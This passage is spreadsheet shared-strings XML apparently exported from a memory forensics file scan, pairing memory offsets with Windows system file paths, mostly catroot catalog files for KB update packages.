  </si>
  <si>
    <t>0xdf649950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2604115~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.1.3</t>
  </si>
  <si>
    <t>0xdf649b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2491683~31bf3</t>
  </si>
  <si>
    <t>0xdf649e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2479943~31bf3</t>
  </si>
  <si>
    <t>0xdf649f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2515325~31bf3</t>
  </si>
  <si>
    <t>0xdf64c9e0</t>
  </si>
  <si>
    <t>\Windows\inf\faxcn002.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf64def8</t>
  </si>
  <si>
    <t>\Windows\System32\localspl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf64ed78</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\win32spl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf64f900</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\WorkstationService-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf64fa30</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\eec0bc2bd68dd00e4635e3852098a5b9\S</t>
  </si>
  <si>
    <t>ystem.Drawing</t>
  </si>
  <si>
    <t>0xdf652148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2631813~31bf3</t>
  </si>
  <si>
    <t>0xdf652460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2621440~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.1.5</t>
  </si>
  <si>
    <t>0xdf652778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2620704~31bf3</t>
  </si>
  <si>
    <t>0xdf652ac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2598845~31bf3</t>
  </si>
  <si>
    <t>0xdf652dd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2579686~31bf3</t>
  </si>
  <si>
    <t>0xdf652f18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2647753~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.4.0</t>
  </si>
  <si>
    <t>0xdf6531a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2736422~31bf3</t>
  </si>
  <si>
    <t>0xdf653378</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2667402~31bf3</t>
  </si>
  <si>
    <t>0xdf653690</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2660075~31bf3</t>
  </si>
  <si>
    <t>0xdf6537d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2685939~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.1.2</t>
  </si>
  <si>
    <t>0xdf6539a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2656356~31bf3</t>
  </si>
  <si>
    <t>0xdf653c58</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2727528~31bf3</t>
  </si>
  <si>
    <t>0xdf654028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2685811~31bf3</t>
  </si>
  <si>
    <t>0xdf654148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2786081~31bf3</t>
  </si>
  <si>
    <t>0xdf654320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2761217~31bf3</t>
  </si>
  <si>
    <t>0xdf654638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2742599~31bf3</t>
  </si>
  <si>
    <t>0xdf6549f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2732487~31bf3</t>
  </si>
  <si>
    <t>0xdf654d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2729452~31bf3</t>
  </si>
  <si>
    <t>0xdf655388</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2813347~31bf3</t>
  </si>
  <si>
    <t>0xdf6556a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2800095~31bf3</t>
  </si>
  <si>
    <t>0xdf6559b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2789645~31bf3</t>
  </si>
  <si>
    <t>0xdf655cd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2773072~31bf3</t>
  </si>
  <si>
    <t>0xdf655e10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2820331~31bf3</t>
  </si>
  <si>
    <t>0xdf655f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2770660~31bf3</t>
  </si>
  <si>
    <t>0xdf656028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2834140~31bf3</t>
  </si>
  <si>
    <t>0xdf6562d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2840631~31bf3</t>
  </si>
  <si>
    <t>0xdf6565e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2836943~31bf3</t>
  </si>
  <si>
    <t>0xdf656900</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2836942~31bf3</t>
  </si>
  <si>
    <t>0xdf656bb0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2847927~31bf3</t>
  </si>
  <si>
    <t>0xdf656e50</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2843630~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.3.1</t>
  </si>
  <si>
    <t>0xdf657290</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2862330~31bf3</t>
  </si>
  <si>
    <t>0xdf657540</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2861698~31bf3</t>
  </si>
  <si>
    <t>0xdf657950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2911501~31bf3</t>
  </si>
  <si>
    <t>0xdf657c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2853952~31bf3</t>
  </si>
  <si>
    <t>0xdf657da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2857650~31bf3</t>
  </si>
  <si>
    <t>0xdf657f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2852386~31bf3</t>
  </si>
  <si>
    <t>0xdf658278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2900986~31bf3</t>
  </si>
  <si>
    <t>0xdf6583b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2908783~31bf3</t>
  </si>
  <si>
    <t>0xdf658590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2894844~31bf3</t>
  </si>
  <si>
    <t>0xdf6588a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2891804~31bf3</t>
  </si>
  <si>
    <t>0xdf658c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2868038~31bf3</t>
  </si>
  <si>
    <t>0xdf658da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2884256~31bf3</t>
  </si>
  <si>
    <t>0xdf658f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2862335~31bf3</t>
  </si>
  <si>
    <t>0xdf659288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2952664~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.25.</t>
  </si>
  <si>
    <t>0xdf6593c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2972100~31bf3</t>
  </si>
  <si>
    <t>0xdf6595a0</t>
  </si>
  <si>
    <t>86~~6.1.23.</t>
  </si>
  <si>
    <t>11.cat</t>
  </si>
  <si>
    <t>0xdf6598b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2931356~31bf3</t>
  </si>
  <si>
    <t>0xdf659bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2918077~31bf3</t>
  </si>
  <si>
    <t>0xdf659d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2937610~31bf3</t>
  </si>
  <si>
    <t>0xdf659ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2912390~31bf3</t>
  </si>
  <si>
    <t>0xdf65a118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3013531~31bf3</t>
  </si>
  <si>
    <t>0xdf65a2f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2985461~31bf3</t>
  </si>
  <si>
    <t>0xdf65a608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2978742~31bf3</t>
  </si>
  <si>
    <t>0xdf65a920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2978120~31bf3</t>
  </si>
  <si>
    <t>0xdf65aa60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2991963~31bf3</t>
  </si>
  <si>
    <t>0xdf65ac38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2972211~31bf3</t>
  </si>
  <si>
    <t>0xdf65aee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2968294~31bf3</t>
  </si>
  <si>
    <t>0xdf65b300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3019978~31bf3</t>
  </si>
  <si>
    <t>0xdf65b440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3021917~31bf3</t>
  </si>
  <si>
    <t>0xdf65b778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3015428~31bf3</t>
  </si>
  <si>
    <t>0xdf65b950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3010788~31bf3</t>
  </si>
  <si>
    <t>0xdf65bc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3006121~31bf3</t>
  </si>
  <si>
    <t>0xdf65bf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3004469~31bf3</t>
  </si>
  <si>
    <t>0xdf65c278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3037574~31bf3</t>
  </si>
  <si>
    <t>0xdf65c590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3035126~31bf3</t>
  </si>
  <si>
    <t>0xdf65c6d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3046269~31bf3</t>
  </si>
  <si>
    <t>0xdf65c8a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3023215~31bf3</t>
  </si>
  <si>
    <t>0xdf65cc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3021674~31bf3</t>
  </si>
  <si>
    <t>0xdf65cf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3020388~31bf3</t>
  </si>
  <si>
    <t>0xdf65d228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3084135~31bf3</t>
  </si>
  <si>
    <t>0xdf65d608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3075220~31bf3</t>
  </si>
  <si>
    <t>0xdf65d748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3107998~31bf3</t>
  </si>
  <si>
    <t>0xdf65d920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3074543~31bf3</t>
  </si>
  <si>
    <t>0xdf65dc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3072305~31bf3</t>
  </si>
  <si>
    <t>0xdf65dd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3075226~31bf3</t>
  </si>
  <si>
    <t>0xdf65dee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3067903~31bf3</t>
  </si>
  <si>
    <t>0xdf65e288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3109103~31bf3</t>
  </si>
  <si>
    <t>0xdf65e5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3108371~31bf3</t>
  </si>
  <si>
    <t>0xdf65e8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3097989~31bf3</t>
  </si>
  <si>
    <t>0xdf65e9f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf65ebd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3093513~31bf3</t>
  </si>
  <si>
    <t>0xdf65eee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3086255~31bf3</t>
  </si>
  <si>
    <t>0xdf65f1f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3127220~31bf3</t>
  </si>
  <si>
    <t>0xdf65f510</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3122648~31bf3</t>
  </si>
  <si>
    <t>0xdf65f650</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3138378~31bf3</t>
  </si>
  <si>
    <t>0xdf65f828</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3115858~31bf3</t>
  </si>
  <si>
    <t>0xdf65fad8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3138910~31bf3</t>
  </si>
  <si>
    <t>0xdf65fee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3109560~31bf3</t>
  </si>
  <si>
    <t>0xdf6601e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3155178~31bf3</t>
  </si>
  <si>
    <t>0xdf660320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3161958~31bf3</t>
  </si>
  <si>
    <t>0xdf6604f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3150513~31bf3</t>
  </si>
  <si>
    <t>0xdf660810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3139914~31bf3</t>
  </si>
  <si>
    <t>0xdf660b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3139398~31bf3</t>
  </si>
  <si>
    <t>0xdf660e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3137061~31bf3</t>
  </si>
  <si>
    <t>0xdf660f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3150220~31bf3</t>
  </si>
  <si>
    <t>0xdf6611e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB4040980~31bf3</t>
  </si>
  <si>
    <t>0xdf6614f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB4019990~31bf3</t>
  </si>
  <si>
    <t>0xdf661638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB4483187~31bf3</t>
  </si>
  <si>
    <t>86~~11.2.1.</t>
  </si>
  <si>
    <t>0xdf661810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3170735~31bf3</t>
  </si>
  <si>
    <t>0xdf661bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3161102~31bf3</t>
  </si>
  <si>
    <t>0xdf661ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB3156016~31bf3</t>
  </si>
  <si>
    <t>0xdf662118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB982018~31bf38</t>
  </si>
  <si>
    <t>6~~6.1.3.2.</t>
  </si>
  <si>
    <t>cat_x001B_[0</t>
  </si>
  <si>
    <t>0xdf662320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_206_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6624f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB976902~31bf38</t>
  </si>
  <si>
    <t>6~~6.1.1.17</t>
  </si>
  <si>
    <t>514.ca</t>
  </si>
  <si>
    <t>0xdf662810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB976422~31bf38</t>
  </si>
  <si>
    <t>6~~6.1.1.0.</t>
  </si>
  <si>
    <t>0xdf662b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB971468~31bf38</t>
  </si>
  <si>
    <t>0xdf662c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB979309~31bf38</t>
  </si>
  <si>
    <t>0xdf662e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB4483458~31bf3</t>
  </si>
  <si>
    <t>0xdf6631c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_209_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6634d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_208_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf663618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_21_for_KB2984976~31bf</t>
  </si>
  <si>
    <t>0xdf663950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_207_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf663b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_205_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf663e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_204_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf664118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_235_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf664430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_234_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf664570</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_240_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf664748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_233_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf664a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_22_for_KB2773072~31bf</t>
  </si>
  <si>
    <t>5.cat_x001B_</t>
  </si>
  <si>
    <t>0xdf664e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_21_for_KB2923545~31bf</t>
  </si>
  <si>
    <t>0xdf664f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_236_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf665190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_24_for_KB2966583~31bf</t>
  </si>
  <si>
    <t>0xdf6652d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_272_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf6654a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_244_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6657e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_239_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf665af8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_238_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf665e10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_237_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf666118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_277_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf666430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_276_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf666748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_275_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf666950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_278_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf666b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_26_for_KB2763523~31bf</t>
  </si>
  <si>
    <t>0xdf666e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_25_for_KB2966583~31bf</t>
  </si>
  <si>
    <t>0xdf667298</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_291_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf667470</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_289_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf667788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_288_for_KB4054518~31b</t>
